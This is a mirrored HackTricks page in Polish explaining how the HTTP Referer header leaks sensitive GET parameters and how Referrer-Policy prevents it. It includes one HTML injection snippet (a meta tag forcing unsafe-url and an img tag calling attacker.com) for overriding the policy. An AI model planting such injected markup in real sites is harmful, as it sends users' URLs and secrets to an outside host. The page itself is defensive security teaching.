Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/interesting-http.md
Translator workflow 5e0daf0e23 Translated to Polish
2024-02-11 01:46:25 +00:00

3.7 KiB
Raw Blame History

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Nagłówki odwołujące i polityka

Odwołujący to nagłówek używany przez przeglądarki do wskazania, która była poprzednia odwiedzona strona.

Wyciek wrażliwych informacji

Jeśli w pewnym momencie na stronie internetowej znajdują się wrażliwe informacje w parametrach żądania GET, jeśli strona zawiera linki do zewnętrznych źródeł lub atakujący jest w stanie sprawić/zasugerować (inżynieria społeczna), że użytkownik odwiedzi adres URL kontrolowany przez atakującego. Może on wydobyć wrażliwe informacje z ostatniego żądania GET.

Zapobieganie

Możesz zmusić przeglądarkę do zastosowania polityki odwołującej (Referrer-policy), która może zapobiec wysyłaniu wrażliwych informacji do innych aplikacji internetowych:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Przeciwdziałanie

Możesz zignorować tę regułę, używając tagu meta HTML (atakujący musi wykorzystać wstrzyknięcie HTML):

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

Obrona

Nigdy nie umieszczaj żadnych wrażliwych danych w parametrach GET ani ścieżkach w adresie URL.

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks: